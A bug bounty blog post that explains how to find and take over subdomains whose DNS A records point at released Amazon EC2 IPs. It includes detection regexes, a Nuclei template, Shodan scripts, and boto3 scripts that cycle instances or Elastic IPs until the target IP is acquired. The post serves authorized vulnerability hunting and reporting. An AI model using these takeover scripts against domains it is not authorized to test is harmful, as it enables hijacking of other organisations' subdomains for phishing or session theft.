Dangling DNS: Amazon EC2 IPs (Current State)
Inspired by Matt Bryant's research on AWS dangling domains in 2015, I was able to revisit the research and apply the technique to bug bounty programs during my bug bounty journey.

  • Shortly after writing my last blog post, I kept getting messages about creating Proof-of-concept (PoC) for this kind of issue, And I thought that I had covered most of the cases, but it turned out I was wrong. So in the post, I’ll try to tear down the technical details for this issue from a bug hunter perspective and then work on automating the process so that bug hunter can apply on a scale.
  • The IP address 3.5.140.229 will be used as an example during this blog post.
  • Most of the scripts are written in Python or Bash.

Let’s start with how EC2-based subdomain takeover differs from common subdomain takeover issues (If subdomain takeover is a new term for you, I recommend Patrik Hudak Blog).
In standard subdomain takeover, we hunt. CNAME, MXor NS records, while in EC2-based subdomain takeover, we hunt A record.

So how we detect if the subdomain is EC2-based? There is three possible ways for fingerprinting part:
  1. 1.
    Subdomain has CNAME record which match one of the following regex
Python
r'ec2-[-\d]+\.compute[-\d]*\.amazonaws\.com'
r'ec2-[-\d]+\.[\w\d\-]+\.compute[-\d]*\.amazonaws\.com'
If you are a fan of Nuclei templates like me, I have built a template for fingerprinting EC2-based subdomains using CNAME records
YAML
ec2-based-detection.yaml
id: ec2-based-detector
info:
name: amazon ec2-based subdomain detection
author: melbadry9
severity: info
tags: dns
dns:
- name: "{{FQDN}}"
type: CNAME
class: inet
recursion: true
retries: 2
matchers:
- type: regex
regex:
- "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com"
- "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com"
2. Subdomain has A record and with reverse IP lookup we get hostname which matches previous regex. We can use hostcommand to perform reverse lookup or using Python.
Bash
host 3.5.140.229
Python
reverse_lookup.py
from dns import resolver,reversename
addr = reversename.from_address("3.5.140.229")
hostname = str(resolver.query(addr,"PTR")[0])
print(hostname)
3. Subdomain has A record which falls within Amazon IP range ip_prefix which can be found here.
Tools which I have used to automate this step anew, httpie, mapcidr to generate file which contains all possible Amazon IPs and check if IP in file
Bash
http https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | .[] | .ip_prefix' -r | mapcidr -silent -o aws_ec2_ips.txt
grep "3.5.140.229" aws_ec2_ips.txt || echo "Not EC2-Based"
I found this code that checks a list of IPs against a list of CIDRs and prints out IPs which fall within the range.
recloud/check_range.go at master · 0x3c3e/recloud
GitHub
go run check_range.go -ip_file /path/to/ips_file -network_file /path/to/cidr_file
At this point, we have identified subdomains and IPs, which are EC2-Based. Let’s check for issues.
After completing fingerprinting phase, we found a subdomain that is EC2-Based. Now what?
JSON
DNS Record For EC2-Based subdomain
{
"host": "sub.example.com",
"resolver": [
"8.8.8.8:53"
],
"a": [
"3.5.140.229"
],
"cname": [
"ec2-3-5-140-229.ap-southeast-1.compute.amazonaws.com"
],
"status_code": "NOERROR"
}

Objective:
Finding proof that our subdomain is currently taken over or had been taken over in the past by a third party.

Manuel Mode
Semi-automated Mode
  • Open http://sub.example.com/ on your browser and check for:
    • Weird content which can't belong to example.com
    • Redirection for a website that doesn't belong to example.com (Location header)
    • Directories using brute force In case the response contains a blank HTML page.
I'll be using httpx for this part to extract title and locationfrom the HTTP response. This tool is very efficient when checking a huge list with EC2-Based subdomains, and I'll have to check the results manually.
echo "sub.example.com" | httpx -title -location
httpx -title -location -l ec2_based_subdomains.txt
Frans Rosén mentioned this technique during a talk "DNS hijacking using cloud providers" in 2017

Manuel Mode
Semi-automated Mode
Monitoring Mode
  • Open https://sub.example.com/ on your browser and check for:
    • Weird content which can't belong to example.com
    • Redirection for a website that doesn't belong to example.com (location header)
    • Directories using brute force In case of the response contains a blank HTML page
  • Open SSL certificate data from the browser and check for (Certificate Warning by the browser):
    • Organization name (Org) which doesn't own example.com
    • Common Name (CN) which doesn't match or belong to example.com
    • Subject Alternative Name (DNS Name) which doesn't match or belong toexample.com
I'll be using httpx for this part to extract dns_names, dns_names and organization name from the SSL certificate. This tool is very efficient when checking a huge list with EC2-Based subdomains.
echo "sub.example.com" | httpx -json | jq '.tls'
httpx -json -l ec2_based_subdomains.txt | jq '.tls'
I'll be using SSLEnum for this part to extract dns_names, dns_names and organization name from the SSL certificate, compare It against the hostname and print out possible vulnerable subdomains. I'll be using notify to send notifications and anew. This technique may produce false-positive results, so confirm SSL data before reporting.
# check the current state of subdomains in the list and save it to check for changes later
cat ec2_based_subomains.txt | sslenum -t 10 | tee -a ec2_takeover.txt
# bash script which will run forever and check for changes in ssl certificate
while true; do
cat ec2_based_subomains.txt | sslenum -t 10 | jq 'select(.dangling == true)' -c | anew ec2_takeover.txt | notify
done

  • We can use passive data collected by search engines like Google, Bing, Shodan and Spyse I'll be using Shodan in the next part.
Manuel Mode
Semi-automated Mode
  • Open https://www.shodan.io and search with the following query net:ip1,ip2, ..
  • For our target, we will use net:3.5.140.229
  • Check HTTP and SSL certificate data collected before to confirm that our subdomain was under third-party control.
To automate search query for multiple IPs on Shodan. I use the following script to fetch data and then analyze them manually.
shodan_ip_query.py
import json
import shodan #pip3 install shodan
def fetch_ip_data(ip:str):
KEY = "shodan_api_key" #Add Shodan API key
api = shodan.Shodan(KEY)
results = api.search('net:{0}'.format(ip))
# Extract http and ssl data for IP if any exists
if results['total'] > 0:
all_ip_data = []
for match in results['matches']:
ip_data = { "ip": ip }
ip_data['ssl'] = match.get("ssl")
ip_data['http'] = match.get("http")
all_ip_data.append(ip_data)
#Print out results and collected data as list
print(json.dumps(all_ip_data, indent=4))
return all_ip_data
fetch_ip_data("3.5.140.229")
  • We can use the Internet archive WaybackMachine to collect old snapshots for our subdomain and apply previous techniques.
  • We can scan ports on our target sub.example.com and check open ports for data to confirm the owner of the current IP.
  • We can contact the security team to inquire about ownership of IP, but this is not possible with every company or program.
Passive detection requires creativity, OSINT skills, and monitoring. Chances for a false positive are relatively high.
You can find your method to detect vulnerable subdomains. Personally, I use previous techniques, so feel free to suggest other techniques, and I'll add them.

Objective:
Take over subdomain IP and assign It to EC2 Instance network interface.
First, we should know how Amazon assigns new IPs to Its customers from the IP pool so that we get our desired IP address 3.5.140.229

  • Every time EC2 Instance stops and starts, Amazon will assign a new IP address to your EC2 Instance.
  • Amazon allows acquiring public IP addresses using Elastic IP.

This method was mentioned before in this blog post, so I wrote a quick script to take over3.5.140.229, which falls within the region ap-southeast-1. We can take over this IP and serve our content on the EC2 server to create our PoC.
This technique has a medium probability of success and can take an enormous amount of time
Python
ec2_bruteforce.py
import boto3 #pip3 install boto3
global INST_IDs
INST_IDs = [""] # created ec2 instance ID
AWSSecretKey = "" # Amazon console secret key
AWSAccessKeyId = "" # Amazon console access key
mon_ips = ['3.5.140.229'] # IP address to takeover
# connect to ec2 service with provided keys
ecc2 = boto3.client(
'ec2',
aws_access_key_id=AWSAccessKeyId,
aws_secret_access_key=AWSSecretKey,
region_name='ap-southeast-1'
)
# extract PublicIp with instance ID
def get_ip(ec2):
ips = []
response = ec2.describe_instances(InstanceIds=INST_IDs)
for inst in response['Reservations']:
for i in inst['Instances']:
for ii in i['NetworkInterfaces']:
ips.append(ii['Association']['PublicIp'])
return ips
# stop ec2 with instance ID
def stop_ec2(ec2):
response = ec2.stop_instances(InstanceIds=INST_IDs, Hibernate=False, Force=True)
print(response)
# start ec2 with instance ID
def start_ec2(ec2):
response = ec2.start_instances(InstanceIds=INST_IDs)
print(response)
if __name__ == "__main__":
found = False
# start and stop ec2 instance until we acquire IP
while not found:
start_ec2(ecc2)
if get_ip(ecc2)[0] == mon_ips[0]:
found = True
print("IP {0} Acquired".format(mon_ips[0]))
else:
stop_ec2(ecc2)
I found this repository very helpful with automating this method using a bash script and awscli command line.

This technique is more practical and faster than the stop-start method. This method has been reported before on HackerOne report. The following script is used to automate this process. Amazon allows up to 5 Elastic IPs for each account per region, so this script can be optimized using multi-threading.
Python
aws_ip_bruter.py
import time
import boto3
found = False
AWSSecretKey = "" # Amazon console secret key
AWSAccessKeyId = "" # Amazon console access key
mon_ips = ['3.5.140.229'] # IP address to takeover
# connect to ec2 service with provided keys
ecc2 = boto3.client(
'ec2',
aws_access_key_id=AWSAccessKeyId,
aws_secret_access_key=AWSSecretKey,
region_name='ap-southeast-1'
)
# acquiring Elastic IP and release it until we acquire specific IP
while not found:
allocation = ecc2.allocate_address(Domain='vpc')
address = allocation["PublicIp"]
allocation_id = allocation["AllocationId"]
if address in mon_ips:
found = True
print("Acquired IP {0}".format(address))
else:
ecc2.release_address(AllocationId=allocation_id)
# make sure to get new addresses
time.sleep(60)
If you have a limited budget on an Amazon account, you should probably keep an eye on the billing section for extra charges.
I found some GitHub repositories which automate active EC2 takeover:

In this part, I'll explain how to create PoC for EC2-Based subdomain takeover.

In this type of takeover, we don't create a traditional PoC. The only kind of PoC we attach when writing a report is the proof, which we found during Passive Phase. If we have not found proof, we monitor the subdomain for changes.

After successfully acquiring the IP address, we attach that IP to EC2 Instance, if it wasn't already. Then we SSH into Instance and create our takeover.html PoC on the web server path /var/www/html/ Now when we visit http://sub.example.com/takeover.html we should see our PoC live. If you can not access your HTTP server, ensure network access is allowed, as mentioned here.

At this point, you're ready to find a vulnerable EC2-Based subdomain takeover and submit a report.
If you decide to depend on Passive Takeover, You should avoid managed programs, as they still tend to ask for traditional PoC files.

Palo Alto Software disclosed on HackerOne: DNS Miconfiguration...
HackerOne
Passive Takeover
OneWeb disclosed on HackerOne: Subdomain Takeover - pmp.oneweb.net
HackerOne
Active Takeover
Copy link
On this page
Note
EC2-Based Subdomain Takeover
Fingerprinting Phase
Passive or Third-Party Takeover Phase
HTTP Method
HTTPS Method
Archived Passive Data
Active Takeover Phase
Start-Stop Method
Elastic-IP Method
Proof-of-Concept Phase
Passive Takeover PoC
Active Takeover PoC
Report Phase
Disclosed Reports